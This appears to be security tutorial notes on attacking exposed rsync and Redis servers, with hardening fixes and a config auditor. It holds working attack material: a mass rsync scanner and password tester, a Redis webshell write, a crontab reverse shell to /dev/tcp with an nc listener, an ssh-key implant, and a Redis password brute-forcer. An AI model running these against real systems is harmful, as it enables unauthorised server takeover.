3.2.1 Rsync
3.2.2 Writing an rsync scanner in Python
3.3 Redis
Rsync
Rsync introduction
• Rsync (remote synchronize) is a remote file synchronization tool; while syncing files it preserves the original permissions, timestamps, symbolic and hard links and other attributes.
• rsync does not encrypt its transfers by default; an ssh tunnel can be used to synchronize over an encrypted channel.
Default port: 873
Configuration parameters
Insecure configuration parameters
Case study
How I compromised the ChinaZ download site server
http://www.anquan.us/static/bugs/wooyun-2013-026232.html
Vulnerability scanning and discovery
```
nmap -n --open -p 873 X.X.X.X/24
```
Contents of test.php:
```
<?php phpinfo(); ?>
```
Upload it into the exposed module (bak) under a new name:
```
rsync test.php 192.168.5.133::bak/hacker.php
```
Fix
Restrict the IP addresses allowed to connect
Do not allow anonymous access
Prevent weak passwords
Do not run the daemon with root privileges
Writing an rsync scanner in Python
Batch scanning in Python
Requirements
Scan for hosts with port 873 open
List the rsync modules (directories)
Try passwords
Code
```python
import os
import datetime
import threading
from socket import *


def save_file(result):
    # Append each open host to a file named after today's date, e.g. 2023-01-01_open.txt
    create_file_name = datetime.datetime.now().strftime('%Y-%m-%d')
    new_file = '{}_open.txt'.format(create_file_name)
    with open(new_file, 'a+') as fd:
        fd.writelines(result + '\n')


def socket_request(tarip, tarport):
    # Generator: yields one "ip:port Open" string if a TCP connect succeeds
    try:
        timeout = 2
        setdefaulttimeout(timeout)
        s = socket(AF_INET, SOCK_STREAM)
        address = (str(tarip), int(tarport))
        s.connect(address)
        s.close()
        info = '{}:{} Open'.format(tarip, tarport)
        print('\033[6;30;42m' + info + '\033[0m')
        save_file(tarip)
        yield info
    except Exception:
        print('\033[0;31m' + '{}:{} {}'.format(tarip, tarport, 'Close') + '\033[0m')


def port_open_scan():
    # Reads one IP per line from ip.txt and probes port 873 on each
    with open('ip.txt', 'r') as read_ip:
        tarport = 873
        for ip in read_ip:
            target_ip = ip.strip()
            for x in socket_request(target_ip, tarport):
                pass


def rsync_pass_check(ip):
    ip = ip.strip()
    # "rsync host::" lists the modules the daemon exports, one "name<TAB>comment" per line
    command = "rsync " + ip + "::"
    print("Checking {}".format(ip))
    dirlist = []
    for line in os.popen(command):
        x = line.find("\t")
        y = line[0:x]
        dirlist.append(y)
    for dir in dirlist:
        userlist = ["www", "root", "test"]
        for user in userlist:
            # pass.txt holds the password rsync reads via --password-file
            crack_command = "rsync " + user + "@" + ip + "::" + dir + " --password-file=pass.txt"
            try:
                if os.popen(crack_command).read():
                    res_str = "[+] Vul Found: " + crack_command
                    with open("Vuln_IP.txt", "a+") as f:
                        f.write(res_str + "\n")
            except Exception as e:
                print(e)


def main():
    port_open_scan()
    open_port = '{}_open.txt'.format(datetime.datetime.now().strftime('%Y-%m-%d'))
    with open(open_port, 'r') as f:
        iplist = f.readlines()
    for ip in iplist:
        rsync_pass_check(ip)


if __name__ == '__main__':
    t = threading.Thread(target=main)
    t.start()
```
Redis
Redis security incidents
Redis is an open-source, network-capable, in-memory key-value store written in ANSI C.
Since the disclosure of the attack that turns unauthenticated Redis access into root on Linux, its ease of use has made it a common way to break into Linux servers for cryptomining.
Security incident
Unauthenticated Redis access on a 凤凰网 site leading to getshell
http://www.anquan.us/static/bugs/wooyun-2015-0161323.html
Default Redis installation
```
wget https://codeload.github.com/antirez/redis/tar.gz/2.8.21
make
make install
cp -p redis.conf /etc/
redis-server /etc/redis.conf
```
Getting a shell through unauthenticated access
Getting a WebShell
Precondition: the web root path is known
```
config set dir /var/www/html/
config set dbfilename shell.php
set x "<?php phpinfo();?>"
save
```
Writing a crontab entry
```
set x "\n* * * * * bash -i >& /dev/tcp/192.168.4.107/6666 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save
```
Attacker side: nc -lvnp 6666
Writing an ssh public key
```
ssh-keygen -t rsa
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
cat foo.txt | redis-cli -h 192.168.4.1 -x set crack
config set dir /root/.ssh/
config get dir
config set dbfilename "authorized_keys"
save
ssh -i id_rsa root@192.168.4.1
```
Brute-forcing Redis with Python
Code
```python
from socket import *

ip = '192.168.4.106'
port = 6379
timeout = 2
setdefaulttimeout(timeout)
s = socket(AF_INET, SOCK_STREAM)
s.connect((ip, int(port)))
# An INFO reply containing redis_version means no AUTH is required
s.send(b"INFO\r\n")
result = s.recv(1024)
if b"redis_version" in result:
    print("未受权访问")
elif b"Authentication" in result:
    # Server demands AUTH: try each password from pass.txt on a fresh connection
    with open('pass.txt', 'r') as read_pass:
        for password in read_pass:
            password = password.strip()
            s = socket(AF_INET, SOCK_STREAM)
            s.connect((ip, int(port)))
            s.send("AUTH {}\r\n".format(password).encode('utf-8'))
            result = s.recv(1024)
            if b'+OK' in result:
                print("密码: {}".format(password))
```
Fix
1. Set a password
Add to redis.conf:
```
requirepass 123qwqwdg23
```
2. Do not expose Redis to the public network
3. Start it as an unprivileged user
```
useradd -r redis
chown -R redis:redis /usr/local/redis/
su redis
redis-server /etc/redis.conf
```
4. Restrict permissions on .ssh and lock it
```
su - redis
chmod 400 .ssh/authorized_keys
chattr +i .ssh/authorized_keys
chattr +i .ssh
```
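The following auditor, added here as an example and not part of the original post, checks a redis.conf for the two settings the fix section above turns on (a requirepass value, and a bind that keeps the server off public interfaces). The sample configs and the function names are constructed for this example; the protected-mode check uses the real Redis 3.2+ directive, which the post does not mention.

```python
import re

# Constructed sample configs (not taken from any real deployment).
WEAK_CONF = """
port 6379
bind 0.0.0.0
dir /var/lib/redis
"""

HARDENED_CONF = """
port 6379
bind 127.0.0.1 -::1
requirepass 123qwqwdg23
dir /var/lib/redis
"""

WILDCARDS = {'0.0.0.0', '::', '*'}


def parse_conf(text):
    """Return {directive: value} for the active (uncommented) lines of a redis.conf."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith('#'):
            continue
        key, _, value = line.partition(' ')
        conf[key.lower()] = value.strip().strip('"')
    return conf


def audit_redis_conf(text, min_pass_len=8):
    """Return a list of findings; an empty list means the checked settings are in place."""
    conf = parse_conf(text)
    findings = []
    password = conf.get('requirepass')
    if not password:
        findings.append('no requirepass: anyone who can reach the port can run CONFIG SET')
    elif len(password) < min_pass_len:
        findings.append('requirepass shorter than {} characters'.format(min_pass_len))
    # With no bind line Redis listens on every interface; "-" prefixes mark optional addresses.
    addrs = [re.sub(r'^-', '', a) for a in conf.get('bind', '').split()]
    if not addrs or any(a in WILDCARDS for a in addrs):
        findings.append('bind missing or wildcard: reachable from every interface')
    if conf.get('protected-mode', 'yes').lower() == 'no':
        findings.append('protected-mode disabled')
    return findings
```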